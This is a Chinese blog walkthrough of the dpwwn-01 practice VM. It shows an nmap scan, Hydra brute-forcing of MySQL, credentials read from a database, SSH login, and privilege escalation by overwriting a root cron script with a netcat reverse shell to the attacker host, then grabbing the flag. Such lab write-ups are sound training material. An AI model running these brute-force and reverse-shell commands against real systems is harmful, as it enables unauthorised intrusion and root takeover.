环境搭建见
https://blog.csdn.net/qq_33163046/article/details/106544200
攻击机:
10.42.**.56(192.168.56.111)
执行步骤:
1.nmap搜索确定靶机IP
root@kali:~# nmap -sS -Pn -A 192.168.56.0/24
......
Nmap scan report for 192.168.56.137
Host is up (0.00012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 08:00:27:C2:6A:E9 (Oracle VirtualBox virtual NIC)
2.对3306端口爆破
Example: hydra -l user -P passlist.txt ftp://192.168.0.1
root@kali:~# hydra -l root -P passwd.txt -e ns -vV mysql://192.168.56.137
......
[VERBOSE] using default db 'mysql'
[STATUS] attack finished for 192.168.56.137 (waiting for children to complete te sts)
[3306][mysql] host: 192.168.56.137 login: root
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-03 23:56: 25
3.用root空密码连接成功
root@kali:~# mysql -h 192.168.56.137 -p -P3306
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 16
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
4.查看有哪些数据库,注意到ssh,并获取到一个可用的ssh账号密码
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| ssh |
+--------------------+
4 rows in set (0.049 sec)
MariaDB [(none)]> use ssh;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password |
+----+----------+---------------------+
| 1 | mistic | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.054 sec)
5.在攻击机用账号密码SSH登陆靶机
root@kali:~# ssh -p22 mistic@192.168.56.137
mistic@192.168.56.137's password:
Last failed login: Thu Jun 4 03:15:19 EDT 2020 on tty1
There were 2 failed login attempts since the last successful login.
Last login: Thu Aug 1 14:41:37 2019 from 192.168.30.145
[mistic@dpwwn-01 ~]$
[mistic@dpwwn-01 ~]$ ls -l
total 4
-rwx------. 1 mistic mistic 186 Aug 1 2019 logrot.sh
6.下载并用LinEnum.sh脚本发现计划任务内存在一个每3分钟以root权限运行的脚本(logrot.sh)在mistic的用户目录下
[mistic@dpwwn-01 ~]$ chmod +x LinEnum.sh
[mistic@dpwwn-01 ~]$ ls -l
total 52
-rwxrwxr-x. 1 mistic mistic 46633 Jun 4 05:11 LinEnum.sh
-rwx------. 1 mistic mistic 36 Jun 4 03:35 logrot.sh
[mistic@dpwwn-01 ~]$ ./LinEnum.sh
......
[-] Crontab contents:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/3 * * * * root /home/mistic/logrot.sh
......7.在logrot.sh内添加了使用nc进行反弹shell的脚本
[mistic@dpwwn-01 ~]$ echo nc -e /bin/bash 192.168.56.111 4444 >logrot.sh
[mistic@dpwwn-01 ~]$ cat logrot.sh
nc -e /bin/bash 192.168.56.111 4444
8.在攻击者的主机使用nc监听4444端口等待被攻击主机上每3分钟执行的反弹shell脚本,最后得到一个交互性差的shell界面,执行权限为root。为了增加交互性,使用了python one liner增加交互界面。
root@kali:~# nc -lvvp 4444
listening on [any] 4444 ...
192.168.56.137: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.137] 47728
python -c 'import pty; pty.spawn("/bin/bash")'
[root@dpwwn-01 ~]# whoami
whoami
root
9.获取FLAG,练习结束
[root@dpwwn-01 ~]# ls
anaconda-ks.cfg dpwwn-01-FLAG.txt
[root@dpwwn-01 ~]# cat dpwwn-01-FLAG.txt
Congratulation! I knew you can pwn it as this very easy challenge.
Thank you.
64445777
6e643634
37303737
37373665
36347077
776e6450
4077246e
33373336
36359090LinEnum.sh脚本:https://github.com/rebootuser/LinEnum
参考文章:https://www.dongluliang.com/?p=737
扫一扫
362
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
